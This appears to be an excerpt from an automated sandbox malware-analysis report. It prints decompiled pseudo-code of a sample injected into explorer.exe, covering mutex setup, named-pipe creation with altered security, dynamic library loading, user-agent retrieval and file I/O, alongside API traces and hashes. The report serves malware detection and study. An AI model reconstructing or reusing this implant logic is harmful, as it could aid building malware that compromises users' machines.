                                          					if(_t18 != 0) {
                                          						_t20 = CreateMutexA(0, 0, 0);
                                          						 *0xde76c = _t20;
                                          						__eflags = _t20;
                                          						if(_t20 != 0) {
                                          							_t34 = E000C8604(0x1000);
                                          							_t52 = 0;
                                          							 *0xde770 = _t34;
                                          							_t49 =  *0xde774; // 0x2
                                          							__eflags = _t34;
                                          							_t41 =  !=  ? 0 : _t49;
                                          							 *0xde774 =  !=  ? 0 : _t49; // executed
                                          						}
                                          						E000C153B(_t41, _t52); // executed
                                          						E000C98EE(E000C2EDA, 0, __eflags, 0, 0); // executed
                                          						E000C3017(); // executed
                                          						E000C31C2(0, __eflags); // executed
                                          						E000C29B1(); // executed
                                          						E000C3BB2(_t54, __eflags); // executed
                                          						while(1) {
                                          							__eflags =  *0xde758; // 0x0
                                          							if(__eflags != 0) {
                                          								break;
                                          							}
                                          							E000C980C(0xde750);
                                          							_push(0xde750);
                                          							_push(0xde750); // executed
                                          							E000C279B();
                                          							Sleep(0xfa0);
                                          						}
                                          						E000C3D34();
                                          						E000C9A8E();
                                          						E000C34CB();
                                          						_t33 = 0;
                                          						__eflags = 0;
                                          					} else {
                                          						goto L3;
                                          					}
                                          				} else {
                                          					_t36 = E000C2DCB();
                                          					_t63 = _t36;
                                          					if(_t36 != 0) {
                                          						L3:
                                          						_t33 = 1;
                                          					} else {
                                          						goto L2;
                                          					}
                                          				}
                                          				return _t33;
                                          			}


                                          APIs
                                          • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000C56D0
                                            • Part of subcall function 000C980C: GetSystemTimeAsFileTime.KERNEL32(?,?,000C5FAF), ref: 000C9819
                                          • Sleep.KERNELBASE(00000FA0), ref: 000C574A
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$CreateFileMutexSleepSystem
                                          • String ID:
                                          • API String ID: 1795067453-0
                                          • Opcode ID: 4d5827915dd088dcf897b8c63985e42f6f3fec60909fc7e0148919ce4e10ea8d
                                          • Instruction ID: eac5d3ba3098b1c205fc506b64538c27d0fa099f414122062ecd2b130421744d
                                          • Opcode Fuzzy Hash: 4d5827915dd088dcf897b8c63985e42f6f3fec60909fc7e0148919ce4e10ea8d
                                          • Instruction Fuzzy Hash: 3A31D4312066509BE764BB75EC4AFDE3B99DF15390B10412EF9098B1A3EE34D5408672
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 26%
                                          			E000CA6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				intOrPtr _t26;
                                          				intOrPtr _t27;
                                          				intOrPtr _t29;
                                          				intOrPtr* _t39;
                                          				void* _t47;
                                          				intOrPtr _t55;
                                          				intOrPtr _t58;
                                          				char _t60;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t50 = _a4;
                                          				_t60 = 0;
                                          				_v12 = 0;
                                          				if(_a4 != 0) {
                                          					_t47 = E000CA63B(_t50);
                                          					if(_t47 == 0) {
                                          						L11:
                                          						_t26 = 0;
                                          						L12:
                                          						L13:
                                          						return _t26;
                                          					}
                                          					_t27 =  *0xde684; // 0x14cf8f0
                                          					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
                                          					if(_t58 == 0) {
                                          						L9:
                                          						_t29 =  *0xde684; // 0x14cf8f0
                                          						 *((intOrPtr*)(_t29 + 0x30))(_t47);
                                          						if(_t60 != 0) {
                                          							E000C861A( &_v12, 0);
                                          						}
                                          						goto L11;
                                          					}
                                          					_t4 = _t58 + 1; // 0x1
                                          					_t60 = E000C8604(_t4);
                                          					_v12 = _t60;
                                          					if(_t60 == 0) {
                                          						goto L9;
                                          					}
                                          					_a4 = _a4 & 0;
                                          					_push(0);
                                          					_v8 = 0;
                                          					_push( &_a4);
                                          					_push(_t58);
                                          					_push(_t60);
                                          					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
                                          						if(_a4 == 0) {
                                          							if(_v8 != _t58) {
                                          								goto L9;
                                          							}
                                          							_t39 = _a8;
                                          							 *((char*)(_t58 + _t60)) = 0;
                                          							if(_t39 != 0) {
                                          								 *_t39 = _t58;
                                          							}
                                          							CloseHandle(_t47);
                                          							_t26 = _t60;
                                          							goto L12;
                                          						}
                                          						_t55 = _v8 + _a4;
                                          						_a4 = _a4 & 0x00000000;
                                          						_push(0);
                                          						_push( &_a4);
                                          						_v8 = _t55;
                                          						_push(_t58 - _t55);
                                          						_push(_t55 + _t60);
                                          					}
                                          					goto L9;
                                          				}
                                          				_t26 = 0;
                                          				goto L13;
                                          			}


                                          APIs
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,000CFA56,00000000,000CF8B5,000EEFE0,000DB990,00000000,000DB990,00000000,00000000,00000615), ref: 000CA733
                                          • CloseHandle.KERNELBASE(00000000,?,000CFA56,00000000,000CF8B5,000EEFE0,000DB990,00000000,000DB990,00000000,00000000,00000615,0000034A,00000000,014CFD20,00000400), ref: 000CA776
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseFileHandleRead
                                          • String ID:
                                          • API String ID: 2331702139-0
                                          • Opcode ID: 7e20f7628843a25b4c6b833c6a6da042d89b600705db7ea788ea2ff22ef9d7ff
                                          • Instruction ID: fbc89baa7441c349636ec3da61cff064576fdbb464b599ad603ef7b6ce517cfa
                                          • Opcode Fuzzy Hash: 7e20f7628843a25b4c6b833c6a6da042d89b600705db7ea788ea2ff22ef9d7ff
                                          • Instruction Fuzzy Hash: 77217A76A05209ABDB50CF64CC84FAE77FCAB09748F10816AF905CB242E730D9408BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 76%
                                          			E000C153B(void* __ecx, void* __edx) {
                                          				void* _v8;
                                          				void* _t3;
                                          				signed int _t4;
                                          				intOrPtr _t7;
                                          				signed int _t9;
                                          				intOrPtr _t10;
                                          				void* _t24;
                                          
                                          				_push(__ecx);
                                          				_t3 = CreateMutexA(0, 0, 0);
                                          				 *0xde6f4 = _t3;
                                          				if(_t3 == 0) {
                                          					L11:
                                          					_t4 = _t3 | 0xffffffff;
                                          					__eflags = _t4;
                                          				} else {
                                          					_t3 = CreateMutexA(0, 0, 0);
                                          					 *0xde6dc = _t3;
                                          					if(_t3 == 0) {
                                          						goto L11;
                                          					} else {
                                          						_t3 = E000C1080(0x4ac);
                                          						_v8 = _t3;
                                          						if(_t3 == 0) {
                                          							goto L11;
                                          						} else {
                                          							 *0xde6e8 = E000C91A6(_t3, 0);
                                          							E000C85C2( &_v8);
                                          							_t7 = E000C8604(0x100);
                                          							 *0xde6f0 = _t7;
                                          							if(_t7 != 0) {
                                          								 *0xde6fc = 0;
                                          								_t9 = E000C8604(0x401);
                                          								 *0xde6d4 = _t9;
                                          								__eflags = _t9;
                                          								if(_t9 != 0) {
                                          									__eflags =  *0xde6c0; // 0x0
                                          									if(__eflags == 0) {
                                          										E000D15B6(E000C8202, 0xc820b);
                                          									}
                                          									_push(0x61e);
                                          									_t24 = 8;
                                          									_t10 = E000CE1BC(0xdbd28, _t24); // executed
                                          									 *0xde6a0 = _t10;
                                          									_t4 = 0;
                                          								} else {
                                          									_push(0xfffffffc);
                                          									goto L5;
                                          								}
                                          							} else {
                                          								_push(0xfffffffe);
                                          								L5:
                                          								_pop(_t4);
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t4;
                                          			}










                                          APIs
                                          • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,000C5707), ref: 000C1545
                                          • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,000C5707), ref: 000C155B
                                            • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateMutex$AllocateHeap
                                          • String ID:
                                          • API String ID: 704353917-0
                                          • Opcode ID: c0b3614160b9c0e721e732cfd7821122ad61b31e0c42afef05f413faf91f14b0
                                          • Instruction ID: 6e75c71e50a5731b0130a832f490ca52ea6bb9a9d023da2c25c43666a8ab9d4c
                                          • Opcode Fuzzy Hash: c0b3614160b9c0e721e732cfd7821122ad61b31e0c42afef05f413faf91f14b0
                                          • Instruction Fuzzy Hash: FD11B970605682AAF760AB75EC05FAE3BE4DBD27A0724422FE911C92D2EF74C4008738
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 44%
                                          			E000CBC7A(void* __ecx, void* __edx) {
                                          				char _v8;
                                          				char _v12;
                                          				char _v16;
                                          				char _v20;
                                          				char _v24;
                                          				char _t18;
                                          				intOrPtr _t19;
                                          				intOrPtr _t27;
                                          				intOrPtr _t30;
                                          				intOrPtr _t36;
                                          				intOrPtr _t38;
                                          				char _t39;
                                          
                                          				_t39 = 0;
                                          				_t38 =  *0xde674; // 0x1fc
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				_v20 = 0;
                                          				_v16 = 0;
                                          				_t18 = E000C95E1(__ecx, 0x84b);
                                          				_push(0);
                                          				_v24 = _t18;
                                          				_push( &_v8);
                                          				_push(1);
                                          				_push(_t18);
                                          				_t19 =  *0xde68c; // 0x14cfab8, executed
                                          				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
                                          					_push( &_v16);
                                          					_push( &_v12);
                                          					_push( &_v20);
                                          					_t27 =  *0xde68c; // 0x14cfab8
                                          					_push(_v8);
                                          					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
                                          						_push(_v12);
                                          						_t30 =  *0xde68c; // 0x14cfab8
                                          						_push(0);
                                          						_push(0);
                                          						_push(0);
                                          						_push(0x10);
                                          						_push(6);
                                          						_push(_t38); // executed
                                          						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
                                          							_t39 = 1;
                                          						}
                                          					}
                                          					_t36 =  *0xde68c; // 0x14cfab8
                                          					 *((intOrPtr*)(_t36 + 0x10))(_v8);
                                          				}
                                          				E000C85D5( &_v24);
                                          				return _t39;
                                          			}















                                          APIs
                                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,?,000C3268,?,?,00000000,?,?,?,000C5721), ref: 000CBCB1
                                          • SetSecurityInfo.ADVAPI32(000001FC,00000006,00000010,00000000,00000000,00000000,?,?,000C3268,?,?,00000000,?,?,?,000C5721), ref: 000CBCE9
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Security$Descriptor$ConvertInfoString
                                          • String ID:
                                          • API String ID: 3187949549-0
                                          • Opcode ID: 82f6e6e030ddb7c3949cedf39d3bd321613d4213fc84a8a5e000ef028c174823
                                          • Instruction ID: a8e78ae5fe899e9e6dcb65718c11a878b9f3e22039a9cadb435a55c152528d81
                                          • Opcode Fuzzy Hash: 82f6e6e030ddb7c3949cedf39d3bd321613d4213fc84a8a5e000ef028c174823
                                          • Instruction Fuzzy Hash: 25112871A01119ABDB10EF95DC89EEEBBBCEF04740F1040AAB905E7191DB749A01CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 47%
                                          			E000CE1BC(void* __ecx, void* __edx, intOrPtr _a4) {
                                          				char _v8;
                                          				char _t5;
                                          				struct HINSTANCE__* _t7;
                                          				void* _t10;
                                          				void* _t12;
                                          				void* _t22;
                                          				void* _t25;
                                          
                                          				_push(__ecx);
                                          				_t12 = __ecx;
                                          				_t22 = __edx;
                                          				_t5 = E000C95C7(_a4);
                                          				_t25 = 0;
                                          				_v8 = _t5;
                                          				_push(_t5);
                                          				if(_a4 != 0x7c3) {
                                          					_t7 = LoadLibraryA(); // executed
                                          				} else {
                                          					_t7 = GetModuleHandleA();
                                          				}
                                          				if(_t7 != 0) {
                                          					_t10 = E000CE171(_t12, _t22, _t7); // executed
                                          					_t25 = _t10;
                                          				}
                                          				E000C85C2( &_v8);
                                          				return _t25;
                                          			}










                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,000DBA28), ref: 000CE1DE
                                          • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,000DBA28), ref: 000CE1EB
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleLibraryLoadModule
                                          • String ID:
                                          • API String ID: 4133054770-0
                                          • Opcode ID: df837670c524f01323393a6d0ba1e5e31ea28cf0f73fd4d437330576f8cc777f
                                          • Instruction ID: b621e06e66ccbc4fe0a1b5701ac5766a354ec37475444ef5371c80a333f06dd2
                                          • Opcode Fuzzy Hash: df837670c524f01323393a6d0ba1e5e31ea28cf0f73fd4d437330576f8cc777f
                                          • Instruction Fuzzy Hash: 2EF0EC32700114ABD744ABADDC85D9EB7ED9F587A0714803EFC06D7151DEB0DE0087A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 65%
                                          			E000C2C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
                                          				WCHAR* _v8;
                                          				char _v12;
                                          				char _v44;
                                          				char _v564;
                                          				char _v1084;
                                          				void* __esi;
                                          				void* _t23;
                                          				struct _SECURITY_ATTRIBUTES* _t25;
                                          				int _t27;
                                          				char _t32;
                                          				char _t38;
                                          				intOrPtr _t39;
                                          				void* _t40;
                                          				WCHAR* _t41;
                                          				void* _t54;
                                          				char* _t60;
                                          				char* _t63;
                                          				void* _t70;
                                          				WCHAR* _t71;
                                          				intOrPtr* _t73;
                                          
                                          				_t70 = __ecx;
                                          				_push(__ecx);
                                          				E000CB700(__edx,  &_v44, __eflags, __fp0);
                                          				_t52 = _t70;
                                          				if(E000CBB8D(_t70) == 0) {
                                          					_t23 = E000C2BA4( &_v1084, _t70, 0x104); // executed
                                          					_pop(_t54);
                                          					__eflags = _t23;
                                          					if(__eflags == 0) {
                                          						_t71 = E000C2C64( &_v1084, __eflags);
                                          					} else {
                                          						E000CB012(_t54,  &_v564); // executed
                                          						_t32 = E000C109A(_t54, 0x375);
                                          						_push(0);
                                          						_v12 = _t32;
                                          						_push( &_v44);
                                          						_t60 = "\\";
                                          						_push(_t60);
                                          						_push(_t32);
                                          						_push(_t60);
                                          						_push( &_v564);
                                          						_push(_t60);
                                          						_t71 = E000C92E5( &_v1084);
                                          						E000C85D5( &_v12);
                                          					}
                                          				} else {
                                          					_t38 = E000C109A(_t52, 0x4e0);
                                          					 *_t73 = 0x104;
                                          					_v12 = _t38;
                                          					_t39 =  *0xde684; // 0x14cf8f0
                                          					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
                                          					_t78 = _t40;
                                          					if(_t40 != 0) {
                                          						_t41 = E000C109A( &_v564, 0x375);
                                          						_push(0);
                                          						_v8 = _t41;
                                          						_push( &_v44);
                                          						_t63 = "\\";
                                          						_push(_t63);
                                          						_push(_t41);
                                          						_push(_t63);
                                          						_t71 = E000C92E5( &_v564);
                                          						E000C85D5( &_v8);
                                          					} else {
                                          						_t71 = E000C2C64( &_v44, _t78);
                                          					}
                                          					E000C85D5( &_v12);
                                          				}
                                          				_v8 = _t71;
                                          				_t25 = E000CB269(_t71);
                                          				if(_t25 == 0) {
                                          					_t27 = CreateDirectoryW(_t71, _t25); // executed
                                          					if(_t27 == 0 || E000CB269(_t71) == 0) {
                                          						E000C861A( &_v8, 0xfffffffe);
                                          						_t71 = _v8;
                                          					}
                                          				}
                                          				return _t71;
                                          			}























                                          APIs
                                          • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 000C2DA1
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateDirectory
                                          • String ID:
                                          • API String ID: 4241100979-0
                                          • Opcode ID: ea5025933a285b4d1b86bea7e61879e591dfe4e52afb863ab189a32f1de6b3f4
                                          • Instruction ID: edd7b77d9a22e79d699e63e24eebf5e62a2d4ad44de2fba8ddeb630291c3af95
                                          • Opcode Fuzzy Hash: ea5025933a285b4d1b86bea7e61879e591dfe4e52afb863ab189a32f1de6b3f4
                                          • Instruction Fuzzy Hash: E13192B1910214AADB24FBA48C96FEE73ACAB04310F14415EF906E7182EF749F408BB4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E000C31C2(void* __edx, void* __eflags) {
                                          				CHAR* _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				void* _v20;
                                          				signed int _t10;
                                          				intOrPtr _t11;
                                          				intOrPtr _t12;
                                          				void* _t16;
                                          				intOrPtr _t18;
                                          				intOrPtr _t22;
                                          				intOrPtr _t28;
                                          				void* _t38;
                                          				CHAR* _t40;
                                          
                                          				_t38 = __edx;
                                          				_t28 =  *0xde688; // 0xf0000
                                          				_t10 = E000CC292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
                                          				_t40 = _t10;
                                          				_v8 = _t40;
                                          				if(_t40 != 0) {
                                          					_t11 = E000C8604(0x80000); // executed
                                          					 *0xde724 = _t11;
                                          					__eflags = _t11;
                                          					if(_t11 != 0) {
                                          						_t12 = E000CBD10(); // executed
                                          						_v16 = _t12;
                                          						__eflags = _t12;
                                          						if(_t12 != 0) {
                                          							_push(0xc);
                                          							_pop(0);
                                          							_v12 = 1;
                                          						}
                                          						_v20 = 0;
                                          						__eflags = 0;
                                          						asm("sbb eax, eax");
                                          						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
                                          						 *0xde674 = _t16;
                                          						__eflags = _t16 - 0xffffffff;
                                          						if(_t16 != 0xffffffff) {
                                          							E000CBC7A( &_v20, _t38); // executed
                                          							_t18 = E000C98EE(E000C32A1, 0, __eflags, 0, 0); // executed
                                          							__eflags = _t18;
                                          							if(_t18 != 0) {
                                          								goto L12;
                                          							}
                                          							_t22 =  *0xde684; // 0x14cf8f0
                                          							 *((intOrPtr*)(_t22 + 0x30))( *0xde674);
                                          							_push(0xfffffffd);
                                          							goto L11;
                                          						} else {
                                          							 *0xde674 = 0;
                                          							_push(0xfffffffe);
                                          							L11:
                                          							_pop(0);
                                          							L12:
                                          							E000C861A( &_v8, 0xffffffff);
                                          							return 0;
                                          						}
                                          					}
                                          					_push(0xfffffff5);
                                          					goto L11;
                                          				}
                                          				return _t10 | 0xffffffff;
                                          			}

                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7d0f7e634e6a7c059e8a9e65dd17be2924dbfbe23cb9281b23f4b3114784c020
                                          • Instruction ID: d13159e9ccd9f4dddc0a4346f52e0233d29fb46ca893f90048703841fd8101b3
                                          • Opcode Fuzzy Hash: 7d0f7e634e6a7c059e8a9e65dd17be2924dbfbe23cb9281b23f4b3114784c020
                                          • Instruction Fuzzy Hash: 6D21F8726051119AEB10BBB8EC45FAE37A8EB55374F20432EF525D71D1DE3085008761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E000C5AFF(intOrPtr __edx, void* __fp0) {
                                          				short _v30;
                                          				short _v32;
                                          				short _v34;
                                          				short _v36;
                                          				intOrPtr* _t22;
                                          				intOrPtr _t23;
                                          				signed int _t30;
                                          				intOrPtr _t38;
                                          				intOrPtr* _t40;
                                          				intOrPtr _t44;
                                          				intOrPtr _t45;
                                          				intOrPtr* _t46;
                                          				signed int _t47;
                                          				void* _t55;
                                          
                                          				_t55 = __fp0;
                                          				_t45 = __edx;
                                          				_t47 = 0;
                                          				_t22 = E000C8604(0x14);
                                          				_t38 =  *0xde688; // 0xf0000
                                          				_t46 = _t22;
                                          				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
                                          					_v36 =  *((intOrPtr*)(_t38 + 0x228));
                                          					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
                                          					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
                                          					_v30 = 0;
                                          					GetDriveTypeW( &_v36); // executed
                                          				}
                                          				 *_t46 = 2;
                                          				 *(_t46 + 4) = _t47;
                                          				_t23 =  *0xde688; // 0xf0000
                                          				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
                                          				_t40 = E000C5A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
                                          				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
                                          				if(_t40 == 0) {
                                          					L9:
                                          					if(E000C2DCB() == 0) {
                                          						goto L11;
                                          					} else {
                                          						_t47 = _t47 | 0xffffffff;
                                          					}
                                          				} else {
                                          					_t45 =  *_t40;
                                          					_t30 = _t47;
                                          					if(_t45 == 0) {
                                          						goto L9;
                                          					} else {
                                          						_t44 =  *((intOrPtr*)(_t40 + 4));
                                          						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
                                          							_t30 = _t30 + 1;
                                          							if(_t30 < _t45) {
                                          								continue;
                                          							} else {
                                          								goto L9;
                                          							}
                                          							goto L12;
                                          						}
                                          						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
                                          							L11:
                                          							E000C4D6D(_t46, _t45, _t55);
                                          						} else {
                                          							goto L9;
                                          						}
                                          					}
                                          				}
                                          				L12:
                                          				E000CA39E();
                                          				E000CA39E();
                                          				return _t47;
                                          			}

                                          APIs
                                            • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                          • GetDriveTypeW.KERNELBASE(?), ref: 000C5B4F
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateDriveHeapType
                                          • String ID:
                                          • API String ID: 414167704-0
                                          • Opcode ID: 99ddb7e7a8e465f67db72aa8efe03724478429e399e3439fdb29f9c17417f0e3
                                          • Instruction ID: e8a148116833502842f1c4452d30bb54f46fd039dd188a520077a7abc4d715bb
                                          • Opcode Fuzzy Hash: 99ddb7e7a8e465f67db72aa8efe03724478429e399e3439fdb29f9c17417f0e3
                                          • Instruction Fuzzy Hash: EB21EB3C6006069BC714AFA4DC44FADB7B4FF48365B24812DE41587292EB31AC82CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 71%
                                          			E000CE450(void* __ecx, void* __edx) {
                                          				char _v8;
                                          				intOrPtr* _t5;
                                          				intOrPtr _t10;
                                          				intOrPtr* _t11;
                                          				void* _t12;
                                          
                                          				_push(__ecx);
                                          				_t5 =  *0xde6b0; // 0x14af1c0
                                          				if( *_t5 == 0) {
                                          					_v8 = E000C95C7(0x2a7);
                                          					 *0xde788 = E000C91A6(_t6, 0);
                                          					E000C85C2( &_v8);
                                          					goto L4;
                                          				} else {
                                          					_v8 = 0x100;
                                          					_t10 = E000C8604(0x101);
                                          					 *0xde788 = _t10;
                                          					_t11 =  *0xde6b0; // 0x14af1c0
                                          					_t12 =  *_t11(0, _t10,  &_v8); // executed
                                          					if(_t12 == 0) {
                                          						L4:
                                          						return 0;
                                          					} else {
                                          						return E000C861A(0xde788, 0xffffffff) | 0xffffffff;
                                          					}
                                          				}
                                          			}

                                          APIs
                                            • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
                                          • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,000CE4F7), ref: 000CE481
                                            • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AgentAllocateFreeObtainStringUser
                                          • String ID:
                                          • API String ID: 471734292-0
                                          • Opcode ID: 6c9bbffbe4edb7a4ff9adc0bce118c51f14637568a92d6f597577bcbae2cc5cb
                                          • Instruction ID: 8079f1387fde3651cf51c068454c49593d8a393480f3ea93dffd8e4335a106f5
                                          • Opcode Fuzzy Hash: 6c9bbffbe4edb7a4ff9adc0bce118c51f14637568a92d6f597577bcbae2cc5cb
                                          • Instruction Fuzzy Hash: 7DF06230609240EBF788EBB4DC4AF9D77E4AB15364F24425DE415DB2D2EFB499409628
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E000CA65C(void* __ecx, void* __edx, intOrPtr _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void* _t13;
                                          				void* _t21;
                                          				void* _t23;
                                          				void* _t26;
                                          
                                          				_t23 = __ecx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t26 = 0;
                                          				_v12 = __ecx;
                                          				_t21 = __edx;
                                          				if(_a4 == 0) {
                                          					L3:
                                          					_t13 = 1;
                                          				} else {
                                          					while(1) {
                                          						_v8 = _v8 & 0x00000000;
                                          						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
                                          							break;
                                          						}
                                          						_t26 = _t26 + _v8;
                                          						_t23 = _v12;
                                          						if(_t26 < _a4) {
                                          							continue;
                                          						} else {
                                          							goto L3;
                                          						}
                                          						goto L4;
                                          					}
                                          					_t13 = 0;
                                          				}
                                          				L4:
                                          				return _t13;
                                          			}

                                          APIs
                                          • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,000C8F51,?), ref: 000CA689
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: 551876cd6162cdc5b2e4ca6e23b02dab5f3737e8c785ecba328694066dc40e87
                                          • Instruction ID: e0b687cbe582983185d491bef9ae05b3aa73082748710466be92ceb60ada6772
                                          • Opcode Fuzzy Hash: 551876cd6162cdc5b2e4ca6e23b02dab5f3737e8c785ecba328694066dc40e87
                                          • Instruction Fuzzy Hash: E7F01D72A10118BFDB10DFA8C884FAE77ECEB05785F144169B505E7140D670EE4097A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E000CA5F7(WCHAR* __ecx, long __edx) {
                                          				intOrPtr _t6;
                                          				long _t12;
                                          				void* _t13;
                                          
                                          				_t12 = __edx;
                                          				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
                                          				if(_t13 != 0xffffffff) {
                                          					if(_t12 == 4) {
                                          						_t6 =  *0xde684; // 0x14cf8f0
                                          						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
                                          					}
                                          					return _t13;
                                          				}
                                          				return 0;
                                          			}

                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,000C8F39), ref: 000CA612
                                          Memory Dump Source
                                          • Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: a9560a278b99c07b65f62764df9b74b27a49f372050d70bf07676ec071247da3
                                          • Instruction ID: 2e7d981304f5d219390b7102899e7dea75ca9fc1daa0b5ba6031beeb52369677
                                          • Opcode Fuzzy Hash: a9560a278b99c07b65f62764df9b74b27a49f372050d70bf07676ec071247da3
                                          • Instruction Fuzzy Hash: E6E09AB23020187EFA202B689CC8F7B26ACE79A7F9F060239FA51C71E0C6208C014271
                                          Uniqueness

                                          Uniqueness Score: -1.00%

